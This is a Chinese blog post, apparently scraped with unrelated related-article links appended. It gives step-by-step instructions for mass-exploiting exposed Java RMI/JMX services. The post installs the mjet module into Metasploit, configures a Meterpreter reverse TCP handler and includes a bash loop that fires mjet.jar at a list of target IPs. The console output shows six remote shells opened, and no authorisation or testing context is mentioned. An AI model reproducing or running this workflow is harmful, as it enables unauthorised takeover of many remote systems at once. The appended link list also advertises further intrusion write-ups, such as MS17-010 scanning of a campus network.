利用MSF批量打RMI漏洞
声明:不会Java。
参考:https://www.secpulse.com/archives/6203.html
下载mjet,https://github.com/mogwaisec/mjet
按照说明中的步骤:
- Copy the "MBean" folder to "data/java/metasploit"
- Copy java_mlet_server.rb to "modules/exploits/multi/misc/"
这里有个坑,metasploit默认目录里没有data/java/这个目录,需要手动创建一下,而且里面缺少Payload.class这个类,find命令找一下,因为每个人的这个class位置都可能不一样。然后把它拷进/data/java/metasploit/下
启动msf监听,选择刚才导入的那个模块
msf > use exploit/multi/misc/java_mlet_server
msf exploit(multi/misc/java_mlet_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(multi/misc/java_mlet_server) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf exploit(multi/misc/java_mlet_server) > set LPORT
LPORT =>
msf exploit(multi/misc/java_mlet_server) > set URIPATH /bobac/
URIPATH => /bobac/
msf exploit(multi/misc/java_mlet_server) > run
[*] Started reverse TCP handler on 1.1.1.1:
[*] Using URL: http://0.0.0.0:8080/bobac/
[*] Local IP: http://1.1.1.1:8080/bobac/
[*] Server started.
然后用下载的mjet.jar让远程主机主动连接我的服务器,批量利用可以写一个shell脚本。
#!/bin/bash
function getip(){
while read i
do
timeout 2s java -jar mjet.jar -u http://1.1.1.1:8080/bobac/ -t `echo $i|awk '{print $1}'` -p `echo $i|awk '{print $2}'`
done < rmi-ip.txt
}
getip
rmi-ip.txt是存放的ip与端口文件,直接执行。msf监听到并且直接获取会话session。
msf exploit(multi/misc/java_mlet_server) >
[*] x.x.x.x java_mlet_server - handling request for /bobac/
[*] Sending stage ( bytes) to x.x.x.x
[*] Meterpreter session opened (x.x.x.x: -> x.x.x.x:) at -- :: +
[*] x.x.x.x java_mlet_server - handling request for /bobac/
[*] Sending stage ( bytes) to x.x.x.x
[*] Meterpreter session opened (x.x.x.x: -> x.x.x.x:) at -- :: +
[*] x.x.x.x java_mlet_server - handling request for /bobac/
[*] Sending stage ( bytes) to x.x.x.x
[*] Meterpreter session opened (x.x.x.x: -> x.x.x.x:) at -- :: +
[*] x.x.x.x java_mlet_server - handling request for /bobac/
[*] x.x.x.x java_mlet_server - handling request for /bobac/
[*] x.x.x.x java_mlet_server - handling request for /bobac/nhUsuayJ.jar
[*] Sending stage ( bytes) to x.x.x.x
[*] Meterpreter session opened (x.x.x.x: -> x.x.x.x:) at -- :: +
6个,sessions -i 找一个进去

--enjoy your shell :)
利用MSF批量打RMI漏洞的更多相关文章
- 实战!利用MSF批量扫描校园网中含有MS17_010漏洞的主机并入侵
利用ms17_010的永恒之蓝在前些日子火爆了一段时间,校园网中也声称封锁了相应端口.最近在搞MSF的深入学习,于是有了下文. ms17_010扫描工具 msf中的辅助模块含有一个强大的ms17_01 ...
- ms17-010 利用msf的exp和一个扫描工具的复现
0x01简介 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码. 攻击对象:win7及win7以下的操作系统且开启了445端口s ...
- 利用Axis2默认口令安全漏洞可入侵WebService网站
利用Axis2默认口令安全漏洞可入侵WebService网站 近期,在乌云上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基 ...
- 利用sql批量删除表,存储过程
利用sql批量删除表,存储过程. 最近用godaddy的空间,由于系统里面的表多,一个个的删除很麻烦,就网上搜集了一下解决方法. 给大家分享一下: 1.批量删除存储过程 declare @procNa ...
- 利用Ossim系统进行主机漏洞扫描
利用Ossim系统进行主机漏洞扫描 企业中查找漏洞要付出很大的努力,不能简单的在服务器上安装一个漏洞扫描软件那么简单,那样起不了多大作用.这并不是因为企业中拥有大量服务器和主机设备,这些服务器和设备又 ...
- 利用Excel批量高速发送电子邮件
利用Excel批量高速发送电子邮件,分两步: 1. 准备待发送的数据: a.) 打开Excel,新建Book1.xlsx b.) 填入以下的内容, 第一列:接收人,第二列:邮件标题,第三列:正文,第四 ...
- 利用 bat 批量处理命令实现手动控制mysql /Oracle 服务的开启和关闭
利用 bat 批量处理命令实现手动控制mysql /Oracle 服务的开启和关闭 因为最近在学习数据库的知识,主要学习的是oracle 数据库,然而好巧啊,java也是在学习,我们老师现在要我们做一 ...
- 利用foo函数的Bof漏洞攻击:构造攻击字符串
利用foo函数的Bof漏洞攻击:构造攻击字符串 一.基础知识储备 objdump反汇编指令.gdb函数调试运行.Perl语言.|管道符 二.实验步骤 1. 通过反汇编了解程序功能及代码 ①反汇编查看文 ...
- JMeter 利用Jmeter批量数据库插入数据
利用Jmeter批量数据库插入数据 by:授客 QQ:1033553122 1. 启动Jmeter 2. 添加 DBC Connection Configuration 右键线程组-> ...
随机推荐
- WAMP环境配置-PHP安装
我这次环境配置安装的是php-5.6.25版本! (最近我在反复安装PHP的时候出现了一个问题,httpd.conf加载php5apache2_4.dll出现错误,怎么修改都不行,此时我安装的是VC1 ...
- Tomcat配置连接池的java实现
1.准备 JNDI(Java Naming and Directory Interface),Java命名和目录接口.JNDI的作用就是:在服务器上配置资源,然后通过统一的方式来获取配置的资源.我们这 ...
- C# Windows服务创建应用
创建项目 1.创建windows服务项目 2.右键点击Service1.cs,查看代码, 用于编写操作逻辑代码 3.OnStart函数在启动服务时执行,OnStop函数在停止服务时执行.代码中OnSt ...
- [生活] 日常英语学习笔记-NEVER HAVE I EVER游戏
逛油管,看视频,学英语. 大家要过周末了说啥 Happy Sunday Have a restful Sunday 有个空闲的周末 我们正在看电影 We are watching movie it ...
- [javaEE] 三层架构案例-用户模块(一)
用户注册登录注销 Servlet+JSP+javaBean+dom4j 分层结构: com.tsh.web com.tsh.service com.tsh.dao com.tsh.domain com ...
- Java Native Interface Specification Contents 翻译
https://docs.oracle.com/en/java/javase/12/docs/specs/jni/index.html Google翻译 第1章:简介 本章介绍Java Native ...
- weblogic11g(10.3.6)部署war包时,解决jar包冲突的超简方案
亲测有效:weblogic11g(10.3.6) + jdk7,打包使用jdk7或jdk8,注意weblogic用的jdk和打包时jdk的兼容. 分别配置web项目下pom.xml和weblogic. ...
- 互联网轻量级框架SSM-查缺补漏第五天
简言:这个地方我就草草过了,NBA圣诞大战,偷偷看比赛,真香~ 第五章映射器 5.2select元素 自动映射和驼峰映射:MyBatis提供了自动映射功能,在默认的情况下自动映射功能是开启的. 在se ...
- Microsoft Windows Scripting Self-Paced Learning Guide
http://www.mums.ac.ir/shares/hit/eduhit/book/windowsscripting.pdfhttp://support.microsoft.com/kb/926 ...
- [转]JSON.parse()和JSON.stringify()
parse用于从一个字符串中解析出json对象,如 var str = '{"name":"huangxiaojian","age":&qu ...